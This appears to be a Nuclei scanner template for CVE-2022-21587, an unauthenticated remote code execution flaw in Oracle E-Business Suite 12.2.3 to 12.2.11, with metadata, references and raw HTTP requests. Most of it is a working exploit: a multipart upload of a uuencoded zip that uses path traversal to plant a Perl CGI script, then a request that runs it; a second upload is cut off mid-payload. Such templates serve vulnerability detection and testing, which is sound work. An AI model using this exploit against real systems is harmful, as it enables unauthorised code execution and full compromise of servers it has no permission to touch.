id: CVE-2022-21587 info: name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-94 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* epss-score: 0.97405 metadata: max-request: 3 tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm http: - raw: - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R M,BTR,34X-R(["G!R:6YT('-Y@```$,``````````````+2!`````"XN+RXN M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO&M&3D174E(N<&Q02P4&``````$``0!Q````VP`````` ` end ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- - | GET /OA_CGI/FNDWRR.exe HTTP/1.1 Host: {{Hostname}} - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M